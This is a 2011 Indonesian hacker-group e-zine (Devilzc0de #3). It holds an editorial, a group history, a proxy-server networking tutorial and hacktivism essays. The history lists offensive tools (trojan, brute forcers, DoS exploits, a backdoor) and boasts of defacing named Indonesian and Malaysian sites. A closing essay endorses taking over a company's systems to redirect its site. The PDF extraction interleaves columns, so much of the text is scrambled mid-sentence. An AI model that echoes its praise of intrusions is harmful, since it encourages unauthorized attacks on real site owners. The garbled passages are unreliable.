Anda di halaman 1dari 70

FIL0S0FI Putih Adalah PUTIH

Goreskan IDEALISME Hacking MU


Disini
“Independence C0DES, DC Backs to Holy”

Devilzc0de
E-Magazine #3 Edisi Transisi

$config['encryption_key'] = 'devilzc0de_is_rock';

-DeMT-
Devilc0de INDONESIA “To Unite and Develop” 2
“Independence C0DES, DC Backs to Holy”

DARI REDAKSI

Tuhan Yang Maha Membebaskan informasi dan


memberi inspirasi, kami Team Redaksi
mempersembahkan e-zine edisi transisi menuju
Devilz E-Magazine dalam rangka pengembangan
“Devilz E-MAGAZINE Team” Komunitas Devilzc0de INDONESIA.

Edisi transisi ini mengangkat tema


Protector
TUHAN YME “Independence CODE, DC Backs to HOLY”

Supervisor terkait hari Kemerdekaan INDONESIA ke-66 serta


Whitehat perayaan Hari Raya Idul Fitri.

Terlalu banyak yang ingin kami sampaikan selaku


DC’s General Tim Redaksi atas terbitnya edisi ini, namun
SUPERMENGANTENG dari kesemuanya kami rangkum menjadi:

DC E-Magazine Leader Team · Dengan semangat membebaskan informasi


Devilzcode E-Magazine memperkenalkan slogan:
Seniman Maya Impressi Maha METAL
“Give the Coder a Freedom,
You’d Get the Free Information.”
Devilz E-Magazine Team
Qrembiezs, Schumbag, Whitecoin
· Ucapan Terima kasih kami atas dukungan semua
Idea, Design and Layout pihak, terutama para kontributor serta pengerak
Whitecoin komunitas Devilzc0de.

SUPORTERS · Kami selaku Tim Redaksi mengucapkan:


Staff Devilzc0de INDONESIA
“Selamat Menyelami Informasi,
Inspirator
mengeskplorasi ılmu dan berbagi“
Devilzc0ders
YOU Kami harap dengan segala kekurangan dan
kelebihannya, Devilzc0de E-Magazine edisi
Contact: transisi ini dapat menjadi penunjang belajar
devilz_ezine@yahoo.co.id para DC’s Readers.
www.devilc0de.org

From Istanbul to Surabaya, through JAKARTA


Cover Picture: Java Democracy (MIT)
Mixed by Whitecoin

Devilz E-Magazine Team (DeMT)


2011

Qrembiezs, Schumbag, Whitecoin

Devilzc0de E-Magazine

Devilc0de INDONESIA “To Unite and Develop” 3


“Independence C0DES, DC Backs to Holy”

Daftar ISI

Devilz Tutorials:
DC Backs to HOLY
Dirgahayu INDONESIA Ku
CI PROJECT CODING 1 (AUTO LOGIN)
(Wenkhairu)
Devilzc0de untuk INDONESIA
Sql Injection Dengan Into Outfile
(DC’s History)
(Unyil)

Eksploitasi WebDAV Vulnerability


Devilz Articles:
(xwungu)
Exploit Merah-Putih
(Nofia Fitri) PHP Programming for Beginner
(Kidofdream)
Hacktivism dan Generasi X
(Whitehat) Membangun Keamanan Wordpress
(Tempe.Mendoan)
Cyberpunk or Mercenaries
(Cakill Schumbag) Remote Computer via Twitter
(Selfdefense)
Meneruskan Kemerdekaan Underground
(T3k0) WTC Anonymous FTP Pentest
White_Heaven_Angels

Devilz Recommendation:
Devilz Notes:
Membangun Jaringan Internet Rt/Rw
(chaer.newbie) Casper_Spy dan Hacker Elite Tante Caroline
(Casper_Spy)
Devilz Figures:
Tahukan Engkau Wahai HACKER!!!
Wawancara Tokoh IT Indonesia (Bunga MataHarry)
”Harry Sufehmi”

Hacker Muda Indonesia Devilz Regards:


“d4r3d3v1l ”
HUT RI ke-66 DAN Idul Fitri
Hacker Profile:
Tim Berners-Lee Devilz Info:

Hacker Writing for Phrack.org


Submission E-Zine #4

Devilz Products:
Devilzc0de T-Shirt
Devilc0de INDONESIA “To Unite and Develop” 4
Devilz Closing by DeMT
“Independence C0DES, DC Backs to Holy”

Selamat Hari Raya


IDUL FITRI

MOHON MAAF
LAHIR DAN BATIN

Pengurus dan Anggota

Devilzc0de INDONESIA Devilzc0de


Backs to
HOLY

Devilc0de INDONESIA “To Unite and Develop” 5


“Independence C0DES, DC Backs to Holy”

Kemerdekaan
adalah…..
kebebasan yang
diperjuangkan

Saatnya
memperjuangkan
kebebasan
bangsaku yang
MIRING

DIRGAHAYU
INDONESIA
JAYALAH
NEGERIKU

Devilzc0de untuk INDONESIA

Devilc0de INDONESIA “To Unite and Develop” 6


“Independence C0DES, DC Backs to Holy”


Have a Nice Study for Everyone
<?php
$x = "x1d70ef32";
$string = "s3HaCkeR05mUdA08mErUbAh09DuNIaVSE5Oy";

WELCOME Devilz Readers();


function MAGAZINE for study ($me,$you){
from = Devilzc0de INDONESIA

$string = "jAyaLaHs306INDONESIAo5kU";



DEVILZ WELCOME

Devilc0de INDONESIA “To Unite and Develop” 7


“Independence C0DES, DC Backs to Holy”

Kemerdekaan adalah hak semua


HACKER, Penjajahan terhadap
kebebasan mengeksplorasi dan
dominasi terhadap produk-produk
INTELEKTUAL harus dihapuskan karena
tidak sesuai dengan prinsip berkarya,
kebebasan berekspresi, dan
ketergantungan sosial yang alami.

Bahwa satu sama lain saling berbagi,


penguasaan karya akan membatasi
kerja manusia dan mengebiri hati
nurani dalam peduli terhadap sesama.

Saatnya memerdekakan karya-karya


KAMI dan memberikan ruang
kebebasan untuk Hacker dalam
mengeskplorasi.

-INDEPENDENCE CODES-

Devilzc0de untuk INDONESIA

Devilc0de INDONESIA “To Unite and Develop” 8


“Independence C0DES, DC Backs to Holy”

DC History [Beta]

Berawal dari sekumpulan anak-anak


Tangerang yang bergabung di salah satu Devilzc0de untuk
Forum Hacker Terbesar Indonesia. Mereka INDONESIA
saling berbagi ilmu yang mereka miliki (Introduction to DC’s
sesama member lainnya. Sedikit demi sedikit History) adalah satu
mereka kenal dan saling mengenal dengan
tulisan khusus yang
member yang lainnya. Terutama sesama
disiapkan Devilz E-Zine
member yang terkhusus untuk daerah
Tangerang, mereka lebih mempererat tali Team dalam rangka

silaturahminya. Mungkin mereka pikir dengan merefleksi sejarah


mengenal member yang satu daerah, selain terbentuknya Devilzc0de
akrab di dunia Maya juga bisa akrab di dunia yang diharapkan dapat
Nyata untuk bisa saling berbagi ilmu Hacking memberikan informasi
secara langsung. kepada seluruh
members sekaligus
readers tentang
DC di Forumotion bagaimana suatu
komunitas DC terbentuk
Dulu Devilzc0de namanya Defacer dan dapat menjadi
Tangerang atau apalah yang sejenisnya yang pegangan kelak kepada
mengatas namakan suatu daerah di
para members serta
karenakan orang-orangnya kebanyakan
pemerhati DC.
berasal dari Tangerang. Mereka anak-anak
Tangerang yang sudah saling mengenal di
Forum Hacker terbesar itu kemudian
mengadakan Gathering perdananya yang di
hadiri oleh; Kiddies, flyff666, Gonzhack,
7460, MyWisdom, petimati, Gunslinger_.
Karena flyff666 telah membuat forum untuk
Devilz
Defacer Tangerang, untuk sementara waktu
forum mereka di namai Defacer Tangerang.
Beberapa minggu kemudian di adakan
HISTORY
gathering kedua, sejak saat itu banyak yang
setuju forum di beri nama Devilzc0de yang
beralamat di

http://devilzc0de.forumotion.com.

Devilz
HISTORY
Devilc0de INDONESIA “To Unite and Develop” 9
“Independence C0DES, DC Backs to Holy”

Devilzc0de.com,  Devilzc0de Cracker “MD5 dan Cracker


Encrypter SHA1 dengan delapan modul dan
Berhubung member DC di mudah digunakan”
http://devilzc0de.forumotion.com sudah banyak, maka  Devilzc0de SQLi “Untuk MySQL, MsSQL dan

DC pindah ke devilzc0de.com MS Acces SQL Injection”


 Devilzc0de Injector [php based] “Untuk Blind

dengan hosting dan domain yang berbayar. Di domain SQL Injection, tapi belum bisa untuk MySQL
versi 4″
yang baru ini DC di kelola oleh Gunslinger_ ,
 FTP Brute Forcer “Buat nge-Brute Password
FTP account”
petimati dan xtronxic. Tidak lama kemudian DC
 Devilzc0de Dual OS Trojan Horse “Untuk
terkena malapetaka, forum yang mereka jaga itu telah
meremote komputer korban”
di jebol oleh ange78 seorang hacker dari http://gaza-
 Dark Jumper “Digunakan untuk menemukan
hacker.com/cc/ (mirror : http://www.zone- setiap website pada server yang sama”
h.org/mirror/id/9709573). Kemudian DC melakukan  Devilzc0de Banner Grab “Untuk mencari info
perbaikan dan dibentuk kepengurusan baru di di Server target”

devilzc0de.org.  SSH Bruter Forcer “Untu nge-Brute Password


account SSH”
 Cisco Dos Exploits “Untuk melakukan
serangan DoS”
Riset & Development  Devilzc0de.asm “Untuk melakukan
BackDooring ke server korban memanfaatkan
Pada dasarnya forum di adakan untuk tujuan sharing port 12345″

sesama member lainnya. Di samping itu juga DC


Aksi Devilzc0de
mempunyai produk yang di share secara gratis untuk

bisa di nikmati bersama oleh member lainnya. Di Bukan Forum Hacker kalau tidak mempunyai kisah
antaranya majalah online berupa E-Book ; deface/hack yang mengejutkan. Banyak aksi deface

yang di lakukan Devilzc0de, namun di antaranya ada


 Devilzc0de Ezine Vol. 1
aksi deface yang sangat mengejutkan dan menjadi
 Devilzc0de Ezine Vol. 2
bahan pembicaraan masyarakat maya. Di bawah ini
Selain tulisan ada juga karyanya berupa tool-tool yang list aksi terbesar Devilzc0de dalam melakukan aksinya
biasa di pakai untuk aktifitas hacking. Dibawah adalah

tool karya anak-anak Devilzc0de ; 1. ServerIsDown.ORG

 DevilzShell “Berupa shell yang digunakan Entah apa alasan mereka yang sesama anak Negri

untuk aktifitas hack website” tapi bisa saling serang ;


 PHP Online “Berupa tool online untuk SQLi
Dork Scanner, Admin Page Finder dan Hash http://serverisdown.org/~lettex/dev.php

MD5 Cracker”

Devilc0de INDONESIA “To Unite and Develop” 10


“Independence C0DES, DC Backs to Holy”

http://devilzc0de.org/~virgin90/ terhadap pihak Malaysia dan pernyataan itu di terima

oleh pihak Malaysia terutama dari Masokis.


Mungkin masalah pribadi, tapi forum yang menjadi

imbasnya. SID has been hacked by flyff666 ; 4. Forum Kompas

http://www.zone-h.org/mirror/id/10420497 <<== Mirror Tidak lama dari serangan ke 1malaysia.com,

SID kena hack oleh flyff666 Devilzc0de beraksi kembali. Tapi ini tidak untuk

mendeface apalagi merusak secara fatal. Deface di


Tapi alhamdulillah akibat kebijakan admin Devilzc0de
lakukan hanya sebatas pemberitahuan kepada admin
(petimati) keduanya bisa kembali berdamai.
kompas untuk segera di perbaiki websitenya.

2. Jagoan Hosting
http://www.zone-h.org/mirror/id/13078051 <<== Mirror

Kompas kena Deface


Jasa web Hosting berarti penyedia host bagi para

pengguna website, otomatis mempunyai keamanan


Terlihat tidak ada sikap menyombongkan diri.
yang super bagi penyedia hosting di dalam
Devilzc0de masih mempunya tatakrama dalam men-
membangun website untuk jual belinya itu. Tapi tidak
Deface suatu website, apalagi ini website dalam negri
untuk Devilzc0de, Devilzc0de telah membuktikan
yang cukup terkenal di kancah online. Untuk itu
kalau web penyedia hosting tidak 100% secure dan
Devilzc0de hanya menyantumkan pesan kepada
masih bisa untuk di bobol. Lagi-lagi flyff666 yang
Admin Kompas untuk segera di Audit website miliknya.
beraksi ;

Selain aksi besar di atas ada juga aksi-aksi lainnya


http://www.zone-h.org/mirror/id/10747624 <<== Mirror
yang bisa di lihat melalui mirror di zone-h.org ;
Jagoan Hosting kena hack oleh flyff666

http://www.zone-h.org/archive/notifier=devilzc0de
Dalam aksi ini lumayan cukup menuai kontroversi.
<<== Semua mirror aksi devilzc0de yang telah di
Bagaimana tidak, web lokal yang satu tanah air di
arsive kan.
hajar juga.

3. 1malaysia.com
Jejaring Social DC
Situs jejaring social yang sudah mulai di isue kan di

koran Malaysia sedia gantikan Facebook ini telah dua Sekarang DC tidak hanya sebatas sebagai untuk

kali berhasil di hack oleh devilzc0de. Berawal dari aksi Forum Hacker saja. Akan tetapi memberikan sesuatu

penantangan terhadap Devilzc0de di shoutmix forum yang berbeda untuk di tampilkan kepada masyarakat

DC yang berujung pada tindakan deface yang di secara luas. Disini (http://devilzc0de.org) akan di

lakukan oleh admin Devilzc0de. Tapi setelah aksi temukan Jejaring Social yang imut dan lucu yang tidak

tersebut DC pun mengeluarkan pernyataan damai sesuai dengan namanya Devilzc0de. Memang untuk

Devilc0de INDONESIA “To Unite and Develop” 11


“Independence C0DES, DC Backs to Holy”

pertama kali orang mendengan kata Devilz pasti Di Indonesia banyak sekali forum-forum yang sama

kesannya negatife dan Jahat. Tapi apalah arti sebuah bahasan dan tujuannya dalam dunia Hacking

nama? DC mencoba memberikan sesuatu yang (UnderGround). Sudah barang tentu persaingan akan

berbeda di Jejaring Social ala Devilzc0de. terjadi, entah itu untuk menjaga gengsi semata atau

hanya sebatas mencari popularitas saja.


Mudah-mudahan masyarakat tidak memandang DC
dari namanya doak serem, tapi kenyataannya tidak Forum Devilzc0de yang dulu hanya mencakup

demikian, itulah yang di tampilkan Devilzc0de di DC bahasan seputar Dunia Hacking kini mencoba sesuatu

Social Network. Satu Jejaring Social yang akrab di yang baru denga Social Networknya yang masih

pandang mata, imut dan juga menggemaskan. dalam versi Beta dan Social Networknya itu dapan

sambutan yang hangat dari masyarakat luas. Tercatat


Pada dasarnya DC sedang membuat SoNet (Social
3000 member sudah terdaftar di SoNet DC untuk hari
Network) untuk saat ini. Satu Jejaring Social yang
kedua pasca SoNet DC di luncurkan.
adanya bukan karena download atau beli produk

orang lain, layaknya beli JCow untuk membangun satu Menanggapi tanggapan tersebut, sudah barang tentu

situs Jejaring Social. Akan tetapi DC berusaha yang namanya persaingan pasti setidaknya ada yang

mengumpulkan sejumlah code-code dan di satu merasa terusik oleh kehadiran SoNet DC. Satu, Dua

padukan (diramu) untuk menjadi satu web Jejaring komunitan Forum Hacker tentunya pasti yang ingin

Social yang tidak kalah menariknya dengan SoNet menjatuhkan DC dan menginginkan DC tidak

paling populer saat ini. Meski pun masih dalam tahap dipercaya lagi dari segi keamanan karena telah bisa di

development, tapi member SoNet DC untuk dua hari tembus (hack) oleh orang lain.

pertama saja sudah mencapai di angka 3000 member.

# Persaingan Sesam Forum Indo

DC yang dulu dan kini masih merupakan Forum

Hacker Tanah air mencoba membentuk satu produk

baru yang belum sama sekali di lakukan oleh Forum

Hacker Indo yang lainnya. Pada saat ini forum-forum


Devlilz Hıstory versi beta ini diambil dari
Indo kebanyakan menampilkan produk dan gaya lebih
tulisan staff DC Matmund terkait dengan
kepada kegelapan sebagai ciri dari komunitas history versi advance yang masih dalam
UnderGroundnya. Tapi tidak untuk DC, walaupun DC penggarapan TIM Redaksi yang akan muncul
di namai Devilz (iblis), tapi DC mencoba menampilkan di Devilz (Magazine) Edisi Pemuda dan
Pahlawan Bangsa (November).
sesuatu yang beda dan malah stylenya bertolak

belakang dengan nama asli DC sebagai Devilz.

Devilc0de INDONESIA “To Unite and Develop” 12


“Independence C0DES, DC Backs to Holy”

Devilzc0de Pengertian RT/RW-Net


Special
RECCOMENDATION RT/RW-Net adalah jaringan komputer swadaya
masyarakat dalam ruang lingkup RT/RW melalui
media kabel atau Wireless 2.4 Ghz dan Hotspot
sebagai sarana komunikasi rakyat yang bebas
dari undang-undang dan birokrasi pemerintah.
Membangun Jaringan Pemanfaatan RT/RW Net ini dapat dikembangkan
sebagai forum komunikasi online yang efektif bagi
Rt/Rw-Net warga untuk saling bertukar informasi,
mengemukakan pendapat, melakukan polling
ataupun pemilihan ketua RT/RW dan lain-lain
yang bebas tanpa dibatasi waktu dan jarak
melalui media e-Mail/Chatting/Web portal,
disamping fungsi koneksi internet yang menjadi
fasilitas utama. Bahkan fasilitas tersebut dapat
dikembangkan hingga menjadi media telepon
gratis dengan teknologi VoIP.

Tujuan membangun RT/RW-Net

 Turut serta dalam pengembangan internet


murah di masyarakat.
 Membangun komunitas yang sadar akan
kehadiran teknologi informasi dan internet.
 Sharing informasi dilingkungan RT/RW
sehingga masyarakat lebih peduli
terhadap lingkungan disekitarnya.
 Mempromosikan setiap kegiatan
masyarakat RT/RW ke Internet sehingga
komunitas tersebut dapat lebih di kenal
dan bisa dijadikan sarana untuk
melakukan bisnis internet.

Tujuan lain dari RT/RW Net ini adalah membuat


Tema : Networking semacam Intranet yang berisi berbagai macam
Author : Chaer Newbie informasi tentang kegiatan yang ada di
lingkungan sekitar. Dengan tersambungnya
rumah-rumah ke jaringan Internet secara terus-
menerus dan tidak terputus, maka bisnis internet
diharapkan akan semakin marak termasuk
pemanfaatan internet untuk pembayaran tagihan
telpon, listrik, pengecekan Saldo Bank,
pemesanan tiket Pesawat dll.

Devilc0de INDONESIA “To Unite and Develop” 13


“Independence C0DES, DC Backs to Holy”

Peralatan dan bahan yang di butuhkan Server : USB Wireless atau wajanbolic
200.000
Untuk memulai proyek RT/RW Net harus ada
Galvanis /Bambu
tempat yang akan dijadikan sebagai Central
100.000
(server) RT/RW-Net yakni tempat untuk
mengelola system jaringan atau tempat akan ________________________________________
diletakanya server perangkat modem, Billing
Total 700.000
Server, Access Point dan Switch dan juga
sebagai tempat untuk mendistribusikan koneksi
internet keseluruh pelanggan /rumah setiap Installasi Rt / Rw NeT
anggota.
Untuk billing saya menggunakan easy hotspot
silahkan download softwarenya di sini
Peralatan dan bahan yang di butuhkan oleh user : http://easyhotspot.inov.asia/
- PC Desktop/Notebook
- Kartu Wireless ( untuk komputer/Notebook yang Disini saya menggunakan sistem voucher prepaid
belum memilki Card Wireless/WiFi) yang mana juga digunakan di cafe hotspot area.
- Antena Yagi atau Wajan Bolik sama halnya userman bila di mikrotik OS yang
bisa juga menjadi billing hotspot external.
Berikut contoh tampilannya :
Perkiraan Biaya Operasional Untuk Server /
Penyedia Layanan Rt/Rw-NeT

Tower 3 stick + lighting Protector


4.000.000
Radio Acesss Point + power
1.000.000
omni Antenna Hyperlink
1.500.000
kabel UTB
700.000
Konektor RJ45 AMP
100.000
Router
500.000
Switch DLINK 24 port
400.000
Tak Terduga
1.000.000
________________________________________

Total 9.200.000 Tahap Installasi :


- Ubuntu 10.10
- Ip proxy 192.168.3.1
- Gatewai 192.168.3.254
Perkiraan Modal Utama Untuk User/Client
- Ip mikrotik ke arah proxy 192.168.3.254/24
- Ram 1 GB
Radio Outdoor 2.4GHz TPLink TL-WA5210G - HDD Sata 80 GB
400.000

Devilc0de INDONESIA “To Unite and Develop” 14


“Independence C0DES, DC Backs to Holy”

1. Partisi HDD # cd LUSCA_HEAD-r14733


Dari harddisk 80 Gb dibagi sebagai berikut:
/ 9 Gb ext4 System ( Flag Boot) # kita patch dulu paket yg kita download tadi,
swap 1 Gb Swap sebelumnya di pastekan dulo ke dir instalasi lusca
/var 10 Gb ext4 Variable :
/squid-1 20 Gb ReiserFS
/squid-2 20 Gb ReiserFS patch -p0 < luscaVaryrR14697.diff
/squid-3 20 Gb ReiserFS patch -p0 <3xx\ loop.diff
patch -p0 < ignore-must-revalidate.diff
patch -p2 < keblux-lusca-gzip.patch
2. Install Paket
# sudo apt-get update
# sudo apt-get install squid
ok sekarang dimulai tahap compile nya
# sudo apt-get install squid squidclient squid-cgi
# sudo apt-get install gcc
CHOST=”i686-pc-linux-gnu” \
# sudo apt-get install build-essential
CFLAGS=”-march=pentium-m -O2 -pipe -fomit-
# sudo apt-get install sharutils
frame-pointer” \
# sudo apt-get install ccze
./configure –prefix=/usr --exec_prefix=/usr –
bindir=/usr/sbin –sbindir=/usr/sbin –
3. Mencari tahu info CPU Super Proxy libexecdir=/usr/lib/squid –sysconfdir=/etc/squid \
–localstatedir=/var/spool/squid –
# Jalankan perintah berikut di terminal untuk datadir=/usr/share/squid –enable-async-io=24 –
melihat informasi CPU kamu : with-aufs-threads=24 –with-pthreads –enable-
storeio=aufs \
cat /proc/cpuinfo –enable-linux-netfilter –enable-arp-acl –enable-
epoll –enable-removal-policies=heap –with-aio –
# untuk pengguna AMD 64 bit bisa di lihat disini : with-dl –enable-snmp \
http://en.gentoo-wiki.com/wiki/Safe_Cflags/AMD –enable-delay-pools –enable-htcp –enable-cache-
# sedangkan pengguna Intel lihat di sini : digests –disable-unlinkd –enable-large-cache-files
http://en.gentoo-wiki.com/wiki/Safe_Cflags/Intel –with-large-files \
–enable-err-languages=English –enable-default-
Catat informasi CHOST dan CFLAGS nya (sesuai err-language=English –with-maxfd=65536
dengan informasi cpu kamu di ubuntu tadi), selanjutnya, ketik perintah berikut di terminal
contoh saya menggunakan intel celeron M, maka
saya memperoleh informasi CHOST dan # make
CFLAGS nya : # sudo make install

CHOST=”i686-pc-linux-gnu” Edit squid.conf


CFLAGS=”-march=pentium-m -O2 -pipe -fomit-
frame-pointer” # stop dulu squidnya dg perintah :

4.Download dan Patch Lusca sudo /etc/init.d/squid stop atau squid stop (ubuntu
dengan perintah : 10.10 Lts)
#'wget http://lusca-
cache.googlecode.com/files/LUSCA_HEAD- # kemudian copy file squid.conf, tunning-
r14733.tar.gz ubuntu.conf dan storeurl-ubuntu.pl yg di download
tadi kedalam folder /etc/squid
lalu ekstrak dan masuk ke foldernya :

# tar xzvf LUSCA_HEAD-r14733.tar.gz

Devilc0de INDONESIA “To Unite and Develop” 15


“Independence C0DES, DC Backs to Holy”

5. Langkah selanjutnya

# Memberikan permission pada folder cache


Devilz Recomendation
chown -R proxy.proxy /squid-1
adalah satu bentuk
chown -R proxy.proxy /squid-2
chown -R proxy.proxy /squid-3
realisasi dari
chmod 755 /etc/squid/storeurl-ubuntu.pl komunitas
chmod 755 /etc/squid/tunning-ubuntu.conf
Devilzc0de INDONESIA
chown -R proxy.proxy /etc/squid/storeurl-
ubuntu.pl terhadap niat
chown -R proxy.proxy /etc/squid/tunning-
berkontribusi kepada
ubuntu.conf
tanah air melalui
# Membuat folder-folder swap/cache di dalam pengembangan technology
folder cache yang telah ditentukan dg perintah : computer stuffs.
Kontribusi lain dalam
squid -f /etc/squid/squid.conf -z bentuk software
development, FREE
# Restart squid ebook, DC’s Projects,
sudo /etc/init.d/squid restart atau squid restart seminar, pendidikan,
(Ubuntu 10.10)
etc.

Jangan lupa tambahkan IP gateway pada route


add gateway kalau sudah tinggal masquerade
networknya untuk NAT di mikrotik. Tampilannya
seperti berikut:

Devilc0de INDONESIA “To Unite and Develop” 16


“Independence C0DES, DC Backs to Holy”

EXPLOIT Merah-Putih adalah kumpulan Selamat Mengeksplorasi luasnya ILMU dan


artikel sang penulis yang tersebar bebas di menjadi idealis dibidangmu.
dunia maya.
Segala macam kritik silahkan ditujukan
Visi dan Misi penulis dari diterbitkannya kepada penulis di nofia.fitri@yahoo.com
kompilasi artikel ini adalah untuk
membebebaskan informasi, berbagi Share link, visit:
pengetahuan, idealisme dan pemahaman
http://www.facebook.com/nofiafitri.azriel
tentang dunia hacking computer yang luas
cakupannya.

Devilc0de INDONESIA “To Unite and Develop” 17


“Independence C0DES, DC Backs to Holy”

HACKTIVISM DAN GENERASİ X


Oleh: Whitehat

Esensi perjalanan hidup manusia adalah Indonesia baru memulai praktek demokrasi yang
menemukan hal-hal yang paling mendasar dalam termasuk termasuk didalamnya adalah kebebasan
menjalani hidup di dunia dan karenanya manusia informasi, bahkan informasi itu sendiri dalam
selalu ingin berkembang dalam misi nya untuk prakteknya bisa di diperjual-belikan. Informasi
melengkapi tujuan hidup. Waktu berjalan dan dalam pengetahuan misalnya bisa membuat
generasi silih berganti, begitu juga manusia pendidikan tertentu, selama dia bisa menguasai
dengan perkembangannya dari waktu ke waktu, materi-materi informasi yang berkenaan dengan
sehingga sampai hari ini kita bisa melihat begitu bidang lain yang dia minati, bukan nya hal
besar kekuatan manusia untuk menjalani hidup mustahil untuk dapat dilakukan.
dan bertahan bahkan dalam persaingan dengan
mahluk lain. Pengembangan demi Contoh lain yang nyata dalam bidang Security IT,
pengembangan, dari generasi ke generasi, semua banyak individu atau perorangan yang
hasilnya kita bisa nikmati dan rasakan sekarang sebenarnya bukan datang dari latar belakang
dibandingkan dengan waktu lampau yg Teknologi dan Informasi bisa melakukan hal-hal,
sedemikian sulit kita dalam berusaha untuk teknik-teknik, bahkan mampu membangun
mengembangkan diri. Saat ini semua menjadi (develop) atau menciptakan sesuatu yang
semakin lebih mudah karena kita terus mencari berhubungan dengan bidang tersebut. Hal ini
dan terus berkembang. karena pembangunan teknologi yang semakin
lama semakin maju dan kemudahan memperoleh
Peran pengembangan itu selalu jatuh dan informasi yang bersangkutan, seperti contoh kita
menjadi tugas generasi muda berikut, begitulah dapat mencari apa saja di dunia ini melalui
seterusnya. Dan pada jaman sekarang kita semua browsing google.com
menyadari bahwa informasi adalah unsur penting
dalam sebuah pengembangan bahkan Manusia adalah mahluk sosial yang
pembangunan, dimana kita didukung oleh membutuhkan manusia lain dalam hidupnya,
informasi dan teknologi yg membantu kita dalam sedemikian perkembangan kehidupan sosial dan
semua aspek kehidupan. Begitu kuat nya pertukaran informasi antar manusia di
kekuatan informasi yang di miliki manusia lingkungan mereka masing-masing menciptakan
bahkan manusia itu sendiri bisa menciptakan golongan-golongan bahkan berbagai komunitas di
perang dan persaingan dengan sesamanya atau berbagai aspek. Dalam hal ini kita bisa melihat
dengan dirinya sendiri. komunitas-komunitas yang ada dalam IT
(Informasi dan Teknologi), dalam perjalanan nya
Saya melihat pada awal mengenal teknologi dan sudah begitu banyak komunitas yang
informasi, seseorang yg memiliki informasi menawarkan banyak sekali informasi mengenai
lengkap di tangannya adalah orang-orang yang bidang tersebut dan materi-materi yang bisa kita
bisa mengendalikan bahkan menguasai lain nya. baca sekedar mengetahui atau mempelajarinya.
Contoh yang dapat kita lihat adalah begitu besar Dari sana pula tumbuh dan muncul kader-kader
efek informasi yg di kumandangkan TV ONE baru dalam bidang tersebut walau mereka datang
seperti “gerakan 1000 coin” untuk Prita, sudah dari latar belakang yang berbeda sekalipun.
anda bisa tebak sendiri berapa jumlah nominal Mereka punya struktur organisasi yang bahkan
hasil dari penyebaran informasi tersebut… bukan bisa dikatakan lebih lengkap daripada organisasi
main. standar lain pada umumnya, punya pimpinan dan
panutan untuk mereka masing-masing.

Masih banyak pekerjaan rumah dalam


pengembangan bidang Security IT dan

Devilc0de INDONESIA “To Unite and Develop” 18


“Independence C0DES, DC Backs to Holy”

implementasinya pada generasi muda Indonesia waktu belajar.” Padahal alangkah baiknya hal
yang menjadi pokok bahasan dalam artikel ini. tersebut tidak perlu di jadikan tradisi yang justru
Salah satu contoh nya adalah perbaikan persepsi mempersulit bahkan berkesan balas dendam atas
yang salah selama ini tentang para pelaku dalam keadaan lampau.
bidang Security IT ini dalam hal ini kita bisa sebut
“Hacker” begitu masyarakat men-cap negatif dan Jaman berubah dan segalanya akan semakin
buruk terhadap kata “hacker” ini dan selalu aksi berkembang dan lebih mudah, yang patut di ingat
nya dikaitkan dengan hal-hal yang merugikan dan adalah kita tidak bisa memaksakan orang lain
melanggar hukum. Kita sendiri tidak membahas untuk bisa menjadi seperti kita tetapi akan lebih
pula sejarah hacker itu sendiri muncul awalnya baik dan lebih berguna dimana kita bisa
dan apa saja yang menjadi dasar tindakan atau mengusahakan perbaikan persepsi yang selama
aksi-aksi mereka karena hal itu sudah banyak ini sudah salah dan bagaimana bisa
dibahas dan dapat dicari dengan mudah di menumbuhkan minat orang-orang sehingga
google.com nantinya perkembangan bidang tersebut bisa
mendapatkan dukungan dari pelbagai pihak.
Kenapa kita memilih bahasan mengenai peran Persaingan yang terjadi sekarang ini adalah hasil
komunitas beserta pengembangan nya di bidang dari perlombaan antar pelaku-pelaku bidang
IT tanah air, lebih cenderung karena kita merasa tersebut karena kurang adanya penyaluran
masih banyak perbaikan dan pengembangan yang kearah yang positif serta didasari oleh masing-
harus disadari oleh berbagai pihak terkait guna masing ego. Ingat lah masa depan akan
meraih tujuan yang lebih baik lagi dalam bidang menghasilkan yang sesuai dengan apa yang
tersebut. Seperti yang kita tahu peran komunitas ditanamkan dahulu. Dan yang jelas adalah
IT yang telah ada di tanah air sebenarnya sangat sosialisasi yang begitu minim dalam waktu
membantu perkembangan awal IT Indonesia. sekarang ini.

Dalam perjalanan berbagai komunitas Selama ini gerakan bawah tanah yang identik
underground yang begitu sangat mempengaruhi dengan tersembunyi dan bergerak sendiri-sendiri
tumbuh kembangnya individu-individu maupun merupakan hal yang sering kita jumpai dan
komunitas lain yang perduli akan penting nya semakin meluas dan (maaf) semakin ngelantur
keamanan sebuah sistem dewasa ini. Dari sana kemana-mana. Ada kalanya kita bisa duduk
lah bermunculan tokoh-tokoh dikalangan ini bersama mengundang dalam sebuah acara
serta pakar-pakar yang bisa dikatakan ahli dalam mungkin yang bersifat informal dan saling
bidang ini. Namun akhir-akhir ini bisa terlihat berdiskusi sehat atas apa yang menjadi misi dan
jelas bahwa semakin surut nya atau bahkan tidak visi kedepannya ketimbang saling menyalakan
terlintas keinginan untuk saling merangkul dan satu sama lain yang jelas-jelas tidak
saling membangun untuk perkembangan bidang menghasilkan apa-apa justru makin menyurutkan
ini dikarenakan sifat natural manusia adalah serta menambah panjang record “minus” dalam
bersaing dan cenderung saling menjatuhkan, dan bidang tersebut.
jangan lupa soal ambisi ingin saling menguasai.

Hal yang dilupakan adalah manusia larut dalam


tingtan dimana dia berada sekarang tanpa ingat
dari mana dia mulai pada tahap awalnya serta hal
yang paling crucial adalah lupa akan generasi
berikutnya yang dalam nota bene masih berupa
lembaran kosong hanya bermodalkan niatan dan
minat yang besar. Belum lagi oknum-oknum yang
memang sengaja ingin merusak atau tidak ingin
adanya perubahan ke arah yang lebih baik.
Seperti pernyataan semacam “biar aja mereka
semua merasakan susahnya generasi tua dulu

Devilc0de INDONESIA “To Unite and Develop” 19


“Independence C0DES, DC Backs to Holy”

cyberpunk or mercenaries pendidikan yang di pecundangi oleh sistem


pemerintahannya.
Oleh: Cakill Schumbag
Atau sebuah perusahaan ekspedisi yang
mengeksploitasi binatang langka. Kuasai
"I’m not talking about idealism even sistemnya, dan redirect ke www.peta2.com
though money oriented, but if I become a supaya menyadarkan begitu pentingnya binatang
cyberpunk that's why i need… all people untuk manusia.
hear me..."
Inti dari bahasan adalah hacktivism dititik
extreem seperti cyberpunk memiliki sisi lain
Sebut saja si 'X' menemukan sebuah situs bahwa mereka menginginkan sebuah 'appreciate'
perusahaan [1] pembuatan sofware yang cukup dari aksinya, entah komunitas/pengguna internet
ternama di negerinya didasari rasa ingin tahu lainnya tak ayal (kaum intelek) juga sering
